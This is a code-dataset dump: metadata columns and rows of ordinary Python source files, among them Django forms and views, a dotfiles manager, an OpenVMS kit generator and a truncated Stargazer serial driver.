hexsha
stringlengths 40
40
| size
int64 5
2.06M
| ext
stringclasses 10
values | lang
stringclasses 1
value | max_stars_repo_path
stringlengths 3
248
| max_stars_repo_name
stringlengths 5
125
| max_stars_repo_head_hexsha
stringlengths 40
78
| max_stars_repo_licenses
listlengths 1
10
| max_stars_count
int64 1
191k
⌀ | max_stars_repo_stars_event_min_datetime
stringlengths 24
24
⌀ | max_stars_repo_stars_event_max_datetime
stringlengths 24
24
⌀ | max_issues_repo_path
stringlengths 3
248
| max_issues_repo_name
stringlengths 5
125
| max_issues_repo_head_hexsha
stringlengths 40
78
| max_issues_repo_licenses
listlengths 1
10
| max_issues_count
int64 1
67k
⌀ | max_issues_repo_issues_event_min_datetime
stringlengths 24
24
⌀ | max_issues_repo_issues_event_max_datetime
stringlengths 24
24
⌀ | max_forks_repo_path
stringlengths 3
248
| max_forks_repo_name
stringlengths 5
125
| max_forks_repo_head_hexsha
stringlengths 40
78
| max_forks_repo_licenses
listlengths 1
10
| max_forks_count
int64 1
105k
⌀ | max_forks_repo_forks_event_min_datetime
stringlengths 24
24
⌀ | max_forks_repo_forks_event_max_datetime
stringlengths 24
24
⌀ | content
stringlengths 5
2.06M
| avg_line_length
float64 1
1.02M
| max_line_length
int64 3
1.03M
| alphanum_fraction
float64 0
1
| count_classes
int64 0
1.6M
| score_classes
float64 0
1
| count_generators
int64 0
651k
| score_generators
float64 0
1
| count_decorators
int64 0
990k
| score_decorators
float64 0
1
| count_async_functions
int64 0
235k
| score_async_functions
float64 0
1
| count_documentation
int64 0
1.04M
| score_documentation
float64 0
1
|
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
c054e5df6525caa1e5b886eedf24790796e7312b
| 862
|
py
|
Python
|
WEEKS/CD_Sata-Structures/_RESOURCES/CODESIGNAL/first_duplicate.py
|
webdevhub42/Lambda
|
b04b84fb5b82fe7c8b12680149e25ae0d27a0960
|
[
"MIT"
] | null | null | null |
WEEKS/CD_Sata-Structures/_RESOURCES/CODESIGNAL/first_duplicate.py
|
webdevhub42/Lambda
|
b04b84fb5b82fe7c8b12680149e25ae0d27a0960
|
[
"MIT"
] | null | null | null |
WEEKS/CD_Sata-Structures/_RESOURCES/CODESIGNAL/first_duplicate.py
|
webdevhub42/Lambda
|
b04b84fb5b82fe7c8b12680149e25ae0d27a0960
|
[
"MIT"
] | null | null | null |
def firstDuplicate(a):
number_frequencies, number_indices, duplicate_index = {}, {}, {}
# Iterate through list and increment frequency count
# if number not in dict. Also, note the index asscoiated
# with the value
for i in range(len(a)):
if a[i] not in number_frequencies:
number_frequencies[a[i]] = 1
number_indices[a[i]] = i
elif a[i] in number_frequencies:
if number_frequencies[a[i]] < 2:
number_frequencies[a[i]] += 1
number_indices[a[i]] = i
for number in number_frequencies:
if number_frequencies[number] == 2:
duplicate_index[number] = number_indices[number]
if not duplicate_index:
return -1
else:
minimal_index_key = min(duplicate_index, key=duplicate_index.get)
return minimal_index_key
| 34.48
| 73
| 0.62413
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 124
| 0.143852
|
c0556573b1b396000e337b73f3de0c54b4d2d005
| 374
|
py
|
Python
|
src/viewer/abs/forms.py
|
ozacas/asxtrade
|
a3645ae526bfc7a546fdf2a39520feda99e3390a
|
[
"Apache-2.0"
] | 8
|
2021-03-20T13:12:25.000Z
|
2022-02-07T11:17:40.000Z
|
src/viewer/abs/forms.py
|
ozacas/asxtrade
|
a3645ae526bfc7a546fdf2a39520feda99e3390a
|
[
"Apache-2.0"
] | 8
|
2021-03-07T03:23:46.000Z
|
2021-06-01T10:49:56.000Z
|
src/viewer/abs/forms.py
|
ozacas/asxtrade
|
a3645ae526bfc7a546fdf2a39520feda99e3390a
|
[
"Apache-2.0"
] | 3
|
2020-12-08T10:22:23.000Z
|
2021-08-04T01:59:24.000Z
|
from django import forms
from django.core.exceptions import ValidationError
from abs.models import dataflows
class ABSDataflowForm(forms.Form):
dataflow = forms.ChoiceField(choices=(), required=True)
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
self.fields["dataflow"].choices = [(i.abs_id, i.name) for i in dataflows()]
| 31.166667
| 83
| 0.71123
| 262
| 0.700535
| 0
| 0
| 0
| 0
| 0
| 0
| 10
| 0.026738
|
c058a47a9fcf9cced343a8955317d5594bcf17a7
| 734
|
py
|
Python
|
pkgs/sdk-pkg/src/genie/libs/sdk/apis/iosxe/dot1x/clear.py
|
patrickboertje/genielibs
|
61c37aacf3dd0f499944555e4ff940f92f53dacb
|
[
"Apache-2.0"
] | 1
|
2022-01-16T10:00:24.000Z
|
2022-01-16T10:00:24.000Z
|
pkgs/sdk-pkg/src/genie/libs/sdk/apis/iosxe/dot1x/clear.py
|
patrickboertje/genielibs
|
61c37aacf3dd0f499944555e4ff940f92f53dacb
|
[
"Apache-2.0"
] | null | null | null |
pkgs/sdk-pkg/src/genie/libs/sdk/apis/iosxe/dot1x/clear.py
|
patrickboertje/genielibs
|
61c37aacf3dd0f499944555e4ff940f92f53dacb
|
[
"Apache-2.0"
] | null | null | null |
# Python
import logging
# Unicon
from unicon.core.errors import SubCommandFailure
# Logger
log = logging.getLogger(__name__)
def clear_access_session_intf(device, intf):
""" clear access-session interface {}
Args:
device (`obj`): Device object
intf('str'): Name of the interface to clear access-session
Returns:
None
Raises:
SubCommandFailure
"""
try:
device.execute('clear access-session interface {intf}'.format(intf=intf))
except SubCommandFailure as e:
raise SubCommandFailure(
"Could not clear access-session interface on {device}. Error:\n{error}"
.format(device=device, error=e)
)
| 24.466667
| 83
| 0.622616
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 386
| 0.525886
|
c059b518fc62b90809941f99c3bd5f94aa341ed5
| 9,713
|
py
|
Python
|
pipeline/forms.py
|
jnis77diver/django-pipeline
|
8bac57adae84615d9d79ad19b2b591c2e46879f9
|
[
"MIT"
] | null | null | null |
pipeline/forms.py
|
jnis77diver/django-pipeline
|
8bac57adae84615d9d79ad19b2b591c2e46879f9
|
[
"MIT"
] | 1
|
2021-09-20T22:02:21.000Z
|
2021-09-21T13:55:41.000Z
|
pipeline/forms.py
|
jnis77diver/django-pipeline
|
8bac57adae84615d9d79ad19b2b591c2e46879f9
|
[
"MIT"
] | 1
|
2021-09-18T01:39:48.000Z
|
2021-09-18T01:39:48.000Z
|
"""Support for referencing Pipeline packages in forms and widgets."""
from __future__ import unicode_literals
from django.contrib.staticfiles.storage import staticfiles_storage
from django.utils.functional import cached_property
try:
from django.utils.six import iteritems, add_metaclass
except ImportError:
from .decorator import add_metaclass
def iteritems(dictionary):
return dictionary.items()
from .collector import default_collector
from .conf import settings
from .packager import Packager
class PipelineFormMediaProperty(object):
"""A property that converts Pipeline packages to lists of files.
This is used behind the scenes for any Media classes that subclass
:py:class:`PipelineFormMedia`. When accessed, it converts any Pipeline
packages into lists of media files and returns or forwards on lookups to
that list.
"""
def __init__(self, get_media_files_func, media_cls, extra_files):
"""Initialize the property.
Args:
get_media_files_func (callable):
The function to call to generate the media files.
media_cls (type):
The Media class owning the property.
extra_files (object):
Files listed in the original ``css`` or ``js`` attribute on
the Media class.
"""
self._get_media_files_func = get_media_files_func
self._media_cls = media_cls
self._extra_files = extra_files
@cached_property
def _media_files(self):
"""The media files represented by the property."""
return self._get_media_files_func(self._media_cls, self._extra_files)
def __get__(self, *args, **kwargs):
"""Return the media files when accessed as an attribute.
This is called when accessing the attribute directly through the
Media class (for example, ``Media.css``). It returns the media files
directly.
Args:
*args (tuple, unused):
Unused positional arguments.
**kwargs (dict, unused):
Unused keyword arguments.
Returns:
object:
The list or dictionary containing the media files definition.
"""
return self._media_files
def __getattr__(self, attr_name):
"""Return an attribute on the media files definition.
This is called when accessing an attribute that doesn't otherwise
exist in the property's dictionary. The call is forwarded onto the
media files definition.
Args:
attr_name (unicode):
The attribute name.
Returns:
object:
The attribute value.
Raises:
AttributeError:
An attribute with this name could not be found.
"""
return getattr(self._media_files, attr_name)
def __iter__(self):
"""Iterate through the media files definition.
This is called when attempting to iterate over this property. It
iterates over the media files definition instead.
Yields:
object:
Each entry in the media files definition.
"""
return iter(self._media_files)
class PipelineFormMediaMetaClass(type):
"""Metaclass for the PipelineFormMedia class.
This is responsible for converting CSS/JavaScript packages defined in
Pipeline into lists of files to include on a page. It handles access to the
:py:attr:`css` and :py:attr:`js` attributes on the class, generating a
list of files to return based on the Pipelined packages and individual
files listed in the :py:attr:`css`/:py:attr:`css_packages` or
:py:attr:`js`/:py:attr:`js_packages` attributes.
"""
def __new__(cls, name, bases, attrs):
"""Construct the class.
Args:
name (bytes):
The name of the class.
bases (tuple):
The base classes for the class.
attrs (dict):
The attributes going into the class.
Returns:
type:
The new class.
"""
new_class = super(PipelineFormMediaMetaClass, cls).__new__(
cls, name, bases, attrs)
# If we define any packages, we'll need to use our special
# PipelineFormMediaProperty class. We use this instead of intercepting
# in __getattribute__ because Django does not access them through
# normal property access. Instead, grabs the Media class's __dict__
# and accesses them from there. By using these special properties, we
# can handle direct access (Media.css) and dictionary-based access
# (Media.__dict__['css']).
if 'css_packages' in attrs:
new_class.css = PipelineFormMediaProperty(
cls._get_css_files, new_class, attrs.get('css') or {})
if 'js_packages' in attrs:
new_class.js = PipelineFormMediaProperty(
cls._get_js_files, new_class, attrs.get('js') or [])
return new_class
def _get_css_files(cls, extra_files):
"""Return all CSS files from the Media class.
Args:
extra_files (dict):
The contents of the Media class's original :py:attr:`css`
attribute, if one was provided.
Returns:
dict:
The CSS media types and files to return for the :py:attr:`css`
attribute.
"""
packager = Packager()
css_packages = getattr(cls, 'css_packages', {})
return dict(
(media_target,
cls._get_media_files(packager=packager,
media_packages=media_packages,
media_type='css',
extra_files=extra_files.get(media_target,
[])))
for media_target, media_packages in iteritems(css_packages)
)
def _get_js_files(cls, extra_files):
"""Return all JavaScript files from the Media class.
Args:
extra_files (list):
The contents of the Media class's original :py:attr:`js`
attribute, if one was provided.
Returns:
list:
The JavaScript files to return for the :py:attr:`js` attribute.
"""
return cls._get_media_files(
packager=Packager(),
media_packages=getattr(cls, 'js_packages', {}),
media_type='js',
extra_files=extra_files)
def _get_media_files(cls, packager, media_packages, media_type,
extra_files):
"""Return source or output media files for a list of packages.
This will go through the media files belonging to the provided list
of packages referenced in a Media class and return the output files
(if Pipeline is enabled) or the source files (if not enabled).
Args:
packager (pipeline.packager.Packager):
The packager responsible for media compilation for this type
of package.
media_packages (list of unicode):
The list of media packages referenced in Media to compile or
return.
extra_files (list of unicode):
The list of extra files to include in the result. This would
be the list stored in the Media class's original :py:attr:`css`
or :py:attr:`js` attributes.
Returns:
list:
The list of media files for the given packages.
"""
source_files = list(extra_files)
if (not settings.PIPELINE_ENABLED and
settings.PIPELINE_COLLECTOR_ENABLED):
default_collector.collect()
for media_package in media_packages:
package = packager.package_for(media_type, media_package)
if settings.PIPELINE_ENABLED:
source_files.append(
staticfiles_storage.url(package.output_filename))
else:
source_files += packager.compile(package.paths)
return source_files
@add_metaclass(PipelineFormMediaMetaClass)
class PipelineFormMedia(object):
"""Base class for form or widget Media classes that use Pipeline packages.
Forms or widgets that need custom CSS or JavaScript media on a page can
define a standard :py:class:`Media` class that subclasses this class,
listing the CSS or JavaScript packages in :py:attr:`css_packages` and
:py:attr:`js_packages` attributes. These are formatted the same as the
standard :py:attr:`css` and :py:attr:`js` attributes, but reference
Pipeline package names instead of individual source files.
If Pipeline is enabled, these will expand to the output files for the
packages. Otherwise, these will expand to the list of source files for the
packages.
Subclasses can also continue to define :py:attr:`css` and :py:attr:`js`
attributes, which will be returned along with the other output/source
files.
Example:
from django import forms
from pipeline.forms import PipelineFormMedia
class MyForm(forms.Media):
...
class Media(PipelineFormMedia):
css_packages = {
'all': ('my-form-styles-package',
'other-form-styles-package'),
'print': ('my-form-print-styles-package',),
}
js_packages = ('my-form-scripts-package',)
js = ('some-file.js',)
"""
| 34.81362
| 79
| 0.615258
| 9,141
| 0.94111
| 0
| 0
| 1,633
| 0.168125
| 0
| 0
| 6,478
| 0.666941
|
c05cbafe5128e838bdc6f0435f143a4bec7be43b
| 1,838
|
py
|
Python
|
api_user/views.py
|
archkwon/python-django-restful-mysql
|
a8097c08057de9656cb40266420fcffebb11bdb6
|
[
"MIT"
] | null | null | null |
api_user/views.py
|
archkwon/python-django-restful-mysql
|
a8097c08057de9656cb40266420fcffebb11bdb6
|
[
"MIT"
] | null | null | null |
api_user/views.py
|
archkwon/python-django-restful-mysql
|
a8097c08057de9656cb40266420fcffebb11bdb6
|
[
"MIT"
] | null | null | null |
from django.http import QueryDict
from django.http.response import JsonResponse
from rest_framework import viewsets, status
from rest_framework.views import APIView
from .serializers import *
class UserInfoViewSet(viewsets.ModelViewSet):
queryset = UserInfoModel.objects.all()
serializer_class = UserInfoSerializer
def get_queryset(self):
queryset = super().get_queryset()
user_id = self.request.query_params.get('user_id', '')
if user_id:
queryset.get(user_id=user_id)
return queryset
class UserInfoSessionView(APIView):
# noinspection PyMethodMayBeStatic
def get(self, request, *args, **kwargs):
user_id = request.GET['user_id']
user_model = UserInfoModel.objects.get(user_id=user_id)
serializer = UserInfoSerializer(user_model)
return JsonResponse({
'code': True,
'status': status.HTTP_200_OK,
'response': serializer.data,
'message': 'SEARCH_SUCCESS'}, status=status.HTTP_200_OK)
# 로그인 토큰 업데이트
class UpdateTokenAction(APIView):
# noinspection PyMethodMayBeStatic
def put(self, request):
put = QueryDict(request.body)
user_id = put.get('user_id')
device_token = put.get('device_token')
if UserInfoModel.objects.filter(user_id=user_id).exists():
user_detail = UserInfoModel.objects.get(user_id=user_id)
user_detail.device_token = device_token
user_detail.save()
return JsonResponse({
'code': True,
'status': status.HTTP_200_OK,
'message': 'UPDATE_SUCCESS'}, status=status.HTTP_200_OK)
return JsonResponse({
'code': False,
'status': status.HTTP_200_OK,
'message': 'FAIL'}, status=status.HTTP_200_OK)
| 31.152542
| 72
| 0.650707
| 1,624
| 0.875
| 0
| 0
| 0
| 0
| 0
| 0
| 259
| 0.139547
|
c05d4625afeae008646d224702597baba51c509c
| 5,043
|
py
|
Python
|
vms/create_kit_files.py
|
vmssoftware/python_3_8_2
|
06cdf3fc9ae103afc55cbd5657ba7c7d09120a81
|
[
"CNRI-Python-GPL-Compatible"
] | 3
|
2020-11-30T22:36:38.000Z
|
2021-01-22T01:00:06.000Z
|
vms/create_kit_files.py
|
vmssoftware/python_3_8_2
|
06cdf3fc9ae103afc55cbd5657ba7c7d09120a81
|
[
"CNRI-Python-GPL-Compatible"
] | null | null | null |
vms/create_kit_files.py
|
vmssoftware/python_3_8_2
|
06cdf3fc9ae103afc55cbd5657ba7c7d09120a81
|
[
"CNRI-Python-GPL-Compatible"
] | 1
|
2021-04-13T13:17:02.000Z
|
2021-04-13T13:17:02.000Z
|
import os
import re
import sys
def spec_replacer(match):
if match.group(0) == ' ':
return '^_'
return '^' + match.group(0)
def create_content(type, major, minor, level, edit):
python_dir = '/python$root'
python_dir_len = len(python_dir)
all_dirs = []
all_files = []
spec_pattern = re.compile('([. ^+()])')
for root, dirs, files in os.walk(python_dir):
inner_dirs = list(filter(lambda x: x != '', spec_pattern.sub(spec_replacer, root[python_dir_len:]).split('/')))
kit_dir = '[' + '.'.join(['python'] + inner_dirs) + ']'
all_dirs.append('directory "' + kit_dir + '" version limit 1;')
for file in files:
file_name, file_ext = os.path.splitext(file)
if file_ext == '':
file_ext = '.'
file_name = spec_pattern.sub(spec_replacer, file_name)
all_files.append('file "' + \
kit_dir + file_name + file_ext + \
'" source "' + \
kit_dir + file_name + file_ext + \
'";')
# try:
# dirs.remove('__pycache__')
# except:
# pass
kit_template = '''--
-- (C) Copyright 2021 VMS Software Inc.
--
product VSI I64VMS PYTHON {type}{major}.{minor}-{level}{edit} FULL ;
--
-- Execute the preconfigure procedure
--
execute preconfigure "@pcsi$source:[python]python$pcsi_preconfigure.com" uses [python]python$pcsi_preconfigure.com ;
--
-- Make sure VMS V8.4 or above is installed
--
if ((not <software VSI I64VMS VMS version minimum V8.4>) and (not <software HP I64VMS VMS version minimum V8.4>)) ;
error NO_MIN_VMS abort ;
end if ;
--
-- ODS-5 Disk(s) should be available on this system
--
if (<logical name PYTHON$ODS5_AVAIL equals 0 table LNM$JOB>) ;
error NO_ODS5_DISKS ;
end if ;
--
-- Directories...
--
{dirs}
--
-- Files...
--
{files}
--
-- Start-up and shutdown scripts
--
file "[sys$startup]python$define_root.com" source "[python]python$define_root.com";
file "[sys$startup]python$startup.com" source "[python]python$startup.com";
file "[sys$startup]python$shutdown.com" source "[python]python$shutdown.com";
--
-- Release notes
--
-- (none)
--
-- Do post-install tasks
--
execute postinstall "@pcsi$source:[python]python$define_root.com" interactive uses "[python]python$define_root.com" ;
--
-- Okay, done. Tell the user what to do next.
--
information POST_INSTALL phase after with helptext;
--
-- All done
--
end product;
'''
# type, major, minor, level, edit must be the same as in pythlib.pcsi$text
kit_content = kit_template.format(
type=type,
major=major,
minor=minor,
level=level,
edit=edit,
dirs='\n '.join(all_dirs),
files='\n '.join(all_files))
with open('python.pcsi$desc', 'w') as file:
file.write(kit_content)
text_template = '''=product VSI I64VMS PYTHON {type}{major}.{minor}-{level}{edit} full
1 'PRODUCT
=prompt Python for OpenVMS is based on Python Version 3.8.2
1 'PRODUCER
=prompt VSI Software Inc.
1 'NOTICE
=prompt (C) Copyright 2021 VMS Software Inc.
1 NO_MIN_VMS
=prompt Minimum OpenVMS software version not found on this system, abort instalation
This kit requires a minimum of OpenVMS I64 V8.4.
1 NO_ODS5_DISKS
=prompt ODS-5 disk(s) not found on this system, abort installation
This kit requires an ODS-5 disk to be correctly installed in this system.
1 POST_INSTALL
=prompt Post-installation tasks are required.
To define the Python runtime at system boot time, add the
following lines to SYS$MANAGER:SYSTARTUP_VMS.COM:
$ file := SYS$STARTUP:PYTHON$STARTUP.COM
$ if f$search("''file'") .nes. "" then @'file'
To shutdown the Python runtime at system shutdown time, add the
following lines to SYS$MANAGER:SYSHUTDWN.COM:
$ file := SYS$STARTUP:PYTHON$SHUTDOWN.COM
$ if f$search("''file'") .nes. "" then @'file'
'''
text_content = text_template.format(
type=type,
major=major,
minor=minor,
level=level,
edit=edit,
dirs='\n '.join(all_dirs),
files='\n '.join(all_files))
with open('python.pcsi$text', 'w') as file:
file.write(text_content)
if __name__ == "__main__":
import getopt
import datetime
opts, args = getopt.getopt(sys.argv[1:], '', ['type=', 'major=', 'minor=', 'level=', 'edit='])
type = 'F'
major = '3'
minor = '8'
level = '2'
edit = '' # 'd' + datetime.date.today().strftime('%Y%m%d')
for opt, optarg in opts:
if opt in ['--type']:
type = optarg
elif opt in ['--major']:
major = optarg
elif opt in ['--minor']:
minor = optarg
elif opt in ['--level']:
level = optarg
elif opt in ['--edit']:
edit = optarg
else:
print('Unknown option %s' % opt)
create_content(
type,
major,
minor,
level,
edit,
)
| 26.265625
| 120
| 0.601229
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 2,887
| 0.572477
|
c05de0c488b3f0907732a9cffd73ea481b5c0be6
| 10,458
|
py
|
Python
|
dotfiles/config/feltnerm/bin/dots.py
|
feltnerm/dotfiles
|
0984ade31ecfcd003e1cce4f165fcd717e9b6317
|
[
"WTFPL"
] | 4
|
2016-06-19T20:02:12.000Z
|
2017-02-27T19:55:49.000Z
|
dotfiles/config/feltnerm/bin/dots.py
|
feltnerm/dotfiles
|
0984ade31ecfcd003e1cce4f165fcd717e9b6317
|
[
"WTFPL"
] | 6
|
2016-01-20T20:24:42.000Z
|
2016-08-17T02:31:43.000Z
|
dotfiles/config/feltnerm/bin/dots.py
|
feltnerm/dotfiles
|
0984ade31ecfcd003e1cce4f165fcd717e9b6317
|
[
"WTFPL"
] | null | null | null |
#!/usr/bin/env python
# .py
# @TODO:
# - fix the diffing
# - use rsync across hosts or something fancy
import argparse, difflib, functools, re, shutil, subprocess, sys, time, os
from pprint import pprint
__description__ = "Manage your dotfiles."
ls = lambda path: os.listdir(path)
ls_abs = lambda path: [os.path.join(path, x) for x in os.listdir(path)]
ln = lambda src, dst: os.symlink(src, dst)
unlink = lambda src: os.unlink(src)
def rm(path):
try:
if os.path.isdir(path):
os.rmdir(path)
else:
os.remove(path)
except OSError, e:
print(e)
def diff(fromfile, tofile):
if os.path.exists(tofile):
fromdate = time.ctime(os.stat(fromfile).st_mtime)
todate = time.ctime(os.stat(tofile).st_mtime)
fromlines = open(fromfile, 'U').readlines()
tolines = open(tofile, 'U').readlines()
diff = difflib.unified_diff(fromlines, tolines,
fromfile, tofile, fromdate, todate)
return diff
def parse_args(argv):
DEFAULTS = {
'source_dir': os.path.join(os.getenv("HOME"), "dotfiles"),
'dest_dir': os.path.join(os.getenv("HOME"))
}
ap = argparse.ArgumentParser(prog='dots.py',
description=__description__)
ap.add_argument("-d", "--dest-dir", default=DEFAULTS['dest_dir'],
help="Directory to process source files to.")
ap.add_argument("-e", "--exclude", help="Regex of files to exclude")
ap.add_argument("-f", "--force", help="Force the operation to continue.")
ap.add_argument("-i", "--interactive", default=False, action='store_true',
help="Run interactively.")
ap.add_argument("-l", "--list-commands", default=False, action='store_true',
help="List the possible commands.")
ap.add_argument("-n", "--dry-run", default=False, action='store_true',
help="Dry run.")
ap.add_argument("--no-dot",
help="Comma-separated list of files to not append a '.' to")
ap.add_argument("-s", "--source-dir", default=DEFAULTS['source_dir'],
help="Directory to process source files from.")
ap.add_argument("-v", "--version", default=False, action='store_true',
help="Print the version.")
ap.add_argument("-V", "--verbose", default=False, action='store_true',
help="Verbose mode.")
ap.add_argument("commands", nargs="*", help="Command to run.")
args = ap.parse_args(argv)
return args
def ask(msg):
inp = raw_input(msg + " [Y]/n?").lower()
while inp not in ('y','n'):
inp = raw_input(msg + " [Y]/n?").lower()
if inp == 'y':
return True
else:
return False
#
# dotfiles command API
#
class Dotfiles(object):
def __init__(self, opts):
self.options = {
"exclude": [
r'^\.'
],
"exclude_list": [
'README.md',
'LICENSE',
'dots.py',
],
"nodot_list": ['bin']
}
for key in opts.keys():
if opts.get(key, None):
self.options[key] = (opts.get(key))
# Look for the source and destination directories
self.src = self.options.get('source_dir', None)
self.dst = self.options.get('dest_dir', None)
if not (os.path.isdir(self.src) and os.path.isdir(self.dst)):
raise Exception("BAD PATH: <Source: %s> <Dest: %s>" %
(self.src, self.dst))
# Process files which to not add a '.' to
_nodot = self.options.get('nodot', None)
if _nodot:
if "," in _nodot:
self.options['nodot_list'].extend(_nodot.split(','))
else:
self.options['nodot_list'].append(_nodot)
# Process regex for excluding files
_re_excludes = self.options.get('exclude', None)
if _re_excludes:
for _re_exclude in _re_excludes:
_re_exclude = _re_exclude.decode('string_escape')
re_exclude = re.compile(_re_exclude)
self.options['exclude_list'].extend(filter(lambda x: re_exclude.match(x), ls(self.src)))
#_re_exclude = self.options.get('exclude', None)
#if _re_exclude:
# _re_exclude = _re_exclude.decode('string_escape')
# re_exclude = re.compile(_re_exclude)
# self.options['exclude_list'].extend(filter(lambda x: re_exclude.match(x), ls(self.src)))
# Pre-process (cache) these files for quick access
#self.source_files = self._nodots(self._exclude(ls(self.src))()
self.source_files = self._exclude(ls(self.src))()
self.dest_files = ls(self.dst)
self.verbose = self.options.get('verbose')
self.interactive = self.options.get('interactive')
self.dry_run = self.options.get('dry_run')
if self.options.get('verbose', False):
pprint(self.options)
@property
def commands(self):
return filter(lambda method: method.startswith('cmd_'), dir(self))
def _nodots(self, l):
def map_func(x):
return x.lstrip('.') if x in self.options['nodot_list'] else x
return functools.partial(map, map_func, l)
def _exclude(self, l):
def filter_func(x):
return x not in [os.path.basename(a) for a in self.options['exclude_list']]
return functools.partial(filter, filter_func, l)
def _execute(self, cmd, func):
if self.dry_run:
self.verbose = True
self.func = None
if self.verbose:
print("# Execute: %s" % cmd)
if func:
func()
def run(self, command):
cmd = 'cmd_' + command
if hasattr(self, cmd):
func = getattr(self, cmd)
if callable(func):
try:
self._execute(cmd, func)
except Exception, e:
print(e)
#
# Commands API
#
def cmd_init(self):
""" Task to initialize dotfiles in your $HOME for the first time. """
print(">> Initing ...")
commands = ['update', 'diff', 'link']
for cmd in commands:
self.run(cmd)
def cmd_diff(self):
""" Show the differences between $DOTFILES and $HOME. """
print(">> Diffing ...")
for from_file in self.source_files:
fromfile = os.path.join(self.options.get('source_dir'), from_file)
if not os.path.isdir(fromfile):
#to_file = os.path.join(self.options.get('dest_dir', from_file))
tofile = os.path.join(self.options.get('dest_dir'), "." + from_file)
sys.stdout.writelines(diff(fromfile, tofile))
def cmd_link(self):
""" Link files in $DOTFILES to corresponding files in $HOME. """
print(">> Linking ...")
for from_file in self.source_files:
fromfile = os.path.join(self.options.get('source_dir'), from_file)
tofile = os.path.join(self.options.get('dest_dir'), "." + from_file)
nodeExists = os.path.lexists(tofile)
if nodeExists:
print("\nFile %s exists already!" % tofile)
if self.options.get('force', False):
if self.interactive:
if ask("Link %s->%s" % (fromfile, tofile)):
if self.verbose:
print("rm(%s)" % (tofile))
print("ln(%s, %s)" % (fromfile, tofile))
if os.path.islink(tofile):
unlink(tofile)
elif os.path.isdir(tofile):
shutil.rmtree(tofile)
ln(fromfile, tofile)
else:
rm(tofile)
ln(fromfile, tofile)
else:
if self.verbose:
print("rm(%s)" % (tofile))
print("ln(%s, %s)" % (fromfile, tofile))
rm(tofile)
ln(fromfile, tofile)
else:
if self.interactive:
if ask("Link %s->%s" % (fromfile, tofile)):
if self.verbose:
print("ln(%s, %s)" % (fromfile, tofile))
ln(fromfile, tofile)
else:
if self.verbose:
print("ln(%s, %s)" % (fromfile, tofile))
ln(fromfile, tofile)
def cmd_clean(self):
""" Clean the dotfiles in $HOME. """
print(">> Cleaning ...")
for from_file in self.source_files:
fromfile = os.path.join(self.options.get('source_dir'), from_file)
tofile = os.path.join(self.options.get('dest_dir'), "." + from_file)
if os.path.lexists(tofile):
if self.verbose:
print("rm(%s)" % tofile)
rm(tofile)
def cmd_update(self):
""" Update dotfiles and dependencies in $HOME with latest
in the repo(s). """
print(">> Updating ...")
cmd = "cd %s; git pull" % self.options.get('source_dir')
output = subprocess.check_output(
cmd,
stderr=subprocess.STDOUT,
shell=True)
print(output)
def cmd_status(self):
""" Status of $DOTFILES. """
print(">> Status: ")
cmd = "cd %s; git status" % self.options.get('source_dir')
output = subprocess.check_output(
cmd,
stderr=subprocess.STDOUT,
shell=True)
print(output)
def run(commands, opts):
df = Dotfiles(opts)
if not opts['commands'] or opts['list_commands']:
for cmd in df.commands:
print(cmd.split("_")[1]+":")
docstring = getattr(getattr(df, cmd), '__doc__')
print(docstring)
else:
for command in commands:
df.run(command)
#
# main
#
def main(argv=None):
args = parse_args(argv)
run(args.commands, vars(args))
return 0 # success
if __name__ == '__main__':
status = main()
sys.exit(status)
| 34.288525
| 104
| 0.52467
| 7,188
| 0.687321
| 0
| 0
| 108
| 0.010327
| 0
| 0
| 2,450
| 0.23427
|
c05e6da89d714cfca87531c2eed521c2ad804f17
| 246
|
py
|
Python
|
plot_log_population.py
|
catskillsresearch/openasr20
|
b9821c4ee6a51501e81103c1d6d4db0ea8aaa31e
|
[
"Apache-2.0"
] | null | null | null |
plot_log_population.py
|
catskillsresearch/openasr20
|
b9821c4ee6a51501e81103c1d6d4db0ea8aaa31e
|
[
"Apache-2.0"
] | null | null | null |
plot_log_population.py
|
catskillsresearch/openasr20
|
b9821c4ee6a51501e81103c1d6d4db0ea8aaa31e
|
[
"Apache-2.0"
] | 1
|
2021-07-28T02:13:21.000Z
|
2021-07-28T02:13:21.000Z
|
import matplotlib.pylab as plt
def plot_log_population(population, _title, _xlabel, _ylabel, _bins):
plt.hist(population,bins=_bins)
plt.xlabel(_xlabel)
plt.ylabel(_ylabel)
plt.title(_title)
plt.yscale('log');
plt.show()
| 24.6
| 69
| 0.707317
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 5
| 0.020325
|
c05e9891a35e2b972d23578bd72644f77e52bb11
| 12,711
|
py
|
Python
|
src/stargazer/stargazer.py
|
magazino/stargazer
|
d350959b830b084d31656682721f68b22683ceba
|
[
"MIT"
] | 1
|
2020-02-16T13:18:39.000Z
|
2020-02-16T13:18:39.000Z
|
src/stargazer/stargazer.py
|
magazino/stargazer
|
d350959b830b084d31656682721f68b22683ceba
|
[
"MIT"
] | 3
|
2017-11-10T14:06:05.000Z
|
2020-04-10T08:27:00.000Z
|
src/stargazer/stargazer.py
|
magazino/stargazer
|
d350959b830b084d31656682721f68b22683ceba
|
[
"MIT"
] | null | null | null |
"""
Driver class for Hagisonic Stargazer, with no ROS dependencies.
"""
from serial import Serial
from collections import deque
import re
import yaml
import time
import logging
import rospy
import numpy as np
from threading import Thread, Event
from tf import transformations
# STX: char that represents the start of a properly formed message
STX = '~'
# ETX: char that represents the end of a properly formed message
ETX = '`'
# DELIM: char that splits data
DELIM = '|'
# CMD: char that indicates command
CMD = '#'
# CMD: char that indicates command
RESPONSE = '!'
# RESULT: char that indicates that the message contains result data
RESULT = '^'
# NOTIFY: char that indicates a notification message of some kind
NOTIFY = '*'
class StarGazer(object):
def __init__(self, device, marker_map, callback_global=None, callback_local=None,callback_raw=None, callback_raw_reponse=None):
"""
Connect to a Hagisonic StarGazer device and receive poses.
device: The device location for the serial connection.
marker_map: dictionary of marker transforms, formatted:
{marker_id: (4,4) matrix}
callback_global: will be called whenever a new pose is received from the
Stargazer, will be called with (n,4,4) matrix of poses
of the location of the Stargazer in the global frame.
These are computed from marker_map.
callback_local: will be called whenever a new poses is received from the
Stargazer, with a dict: {marker_id: [xyz, angle]}
"""
self.device = device
self.marker_map = marker_map
self.connection = None
# chunk_size: how many characters to read from the serial bus in
